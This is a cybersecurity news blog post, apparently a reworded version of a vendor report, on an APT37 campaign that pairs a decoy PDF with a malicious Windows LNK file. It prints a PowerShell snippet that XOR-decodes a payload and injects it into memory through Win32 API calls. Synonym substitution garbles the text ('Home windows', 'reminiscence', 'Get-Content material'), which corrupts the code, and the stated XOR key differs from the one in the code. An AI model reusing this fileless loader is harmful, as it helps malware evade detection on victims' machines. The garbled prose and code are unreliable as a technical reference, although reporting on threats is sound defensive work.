Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Hackers Weaponize PDF Along With a Malicious LNK File to Compromise Windows Systems

Hackers Weaponize PDF Along With a Malicious LNK File to Compromise Windows Systems

Posted on August 29, 2025August 29, 2025 By CWS

Attackers have begun leveraging a seemingly innocuous PDF publication alongside a malicious Home windows shortcut (LNK) file to infiltrate enterprise environments.

The assault surfaced in late August 2025, focusing on South Korean educational and authorities establishments beneath the guise of a legit “국가정보연구회 소식지 (52호)” PDF publication.

Victims obtain an archive containing each the PDF decoy and a companion .lnk file masquerading because the publication. When the shortcut is executed, a multi‐stage PowerShell loader embedded inside the LNK unpacks and deploys extra payloads completely in reminiscence, evading disk‐primarily based detection.

Early evaluation revealed that the LNK file hides three binary payloads at exact offsets: a decoy PDF at offset 0x0000102C, a loader binary at 0x0007EDC1, and a remaining executable at 0x0015AED2.

Upon execution, a PowerShell one-liner inside the LNK reads these offsets, writes the binaries to %TEMP% as aio0.dat, aio1.dat, and aio1+3.b+la+t, after which kicks off a batch script (aio03.bat) to decode and run the loader.

Seqrite analysts famous that this fileless method permits the attackers to bypass signature‐primarily based defenses by by no means writing the final word payload to disk.

Subsequent investigation by Seqrite researchers recognized that the ultimate payload, as soon as decrypted with a single‐byte XOR key (0x35), is injected instantly into reminiscence by way of Home windows API calls—GlobalAlloc, VirtualProtect, and CreateThread.

This reflective DLL injection approach ensures that the malicious code executes in a stealthy method, leaving minimal forensic artifacts.

Detailed reverse engineering of the loader binary uncovered surroundings checks for VMware instruments and sandbox evasion routines that stop execution in evaluation environments, confirming the excessive sophistication of the risk actor referred to as APT37.

Marketing campaign 1 an infection chain (Supply – Seqrite)

$exePath = “$env:temptony31.dat”
$exeFile = Get-Content material -Path $exePath -Encoding Byte
$key = 0x37
for ($i = 0; $i -lt $exeFile.Size; $i++) {
$exeFile[$i] = $exeFile[$i] -bxor $key
}
$buf = [Win32]::GlobalAlloc(0x40, $exeFile.Size)
[Win32]::VirtualProtect($buf, $exeFile.Size, 0x40, [ref]$outdated)
[Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Size)
[Win32]::CreateThread(0,0,$buf,0,0,[ref]$null)

An infection Mechanism

The an infection begins when the consumer double‐clicks the misleading .lnk file, which triggers PowerShell beneath the hood.

Marketing campaign 2 an infection chain (Supply – Seqrite)

The script parses its personal binary content material utilizing Get-Merchandise and ReadAllBytes, extracting the decoy PDF for show whereas staging the actual payloads.

As soon as staged, the batch loader executes Invoke-Expression on a UTF-8 decoded script saved in aio02.dat, which in flip orchestrates the XOR decryption and reflective injection of aio01.dat.

By leveraging in-memory execution, the attackers sidestep typical endpoint safety platforms that depend on disk‐primarily based scanning.

This layered an infection chain, combining decoy paperwork, embedded payloads, and fileless strategies, underlines the evolving sophistication of state‐sponsored cyber espionage campaigns.

Increase your SOC and assist your group defend what you are promoting with free top-notch risk intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:Compromise, File, Hackers, LNK, Malicious, PDF, Systems, Weaponize, Windows

Post navigation

Previous Post: Cyber Attacks Targeting Education Sector Surges Following Back-to-School Season
Next Post: VerifTools Fake ID Operation Dismantled by Law Enforcement

Related Posts

New Chinese Nexus APT Hackers Attacking Organizations to Deliver NET-STAR Malware Suite New Chinese Nexus APT Hackers Attacking Organizations to Deliver NET-STAR Malware Suite Cyber Security News
NAKIVO v11.1 Introduces Stronger Protection for Virtual Environments NAKIVO v11.1 Introduces Stronger Protection for Virtual Environments Cyber Security News
New Spear-Phishing Attack Targeting Security Individuals in Israel Region New Spear-Phishing Attack Targeting Security Individuals in Israel Region Cyber Security News
SnakeKeylogger via Weaponized E-mails Leverage PowerShell to Exfiltrate Sensitive Data SnakeKeylogger via Weaponized E-mails Leverage PowerShell to Exfiltrate Sensitive Data Cyber Security News
Fired Techie Admits Hacking Employer’s Network in Retaliation for Termination Fired Techie Admits Hacking Employer’s Network in Retaliation for Termination Cyber Security News
New DNS Malware Detour Dog Delivers Strela Stealer Using DNS TXT Records New DNS Malware Detour Dog Delivers Strela Stealer Using DNS TXT Records Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages
  • DragonForce Ransomware Group’s Expanding Cartel Operations
  • North Korean Hackers Exploit AI for Enhanced Cyber Attacks

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages
  • DragonForce Ransomware Group’s Expanding Cartel Operations
  • North Korean Hackers Exploit AI for Enhanced Cyber Attacks

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News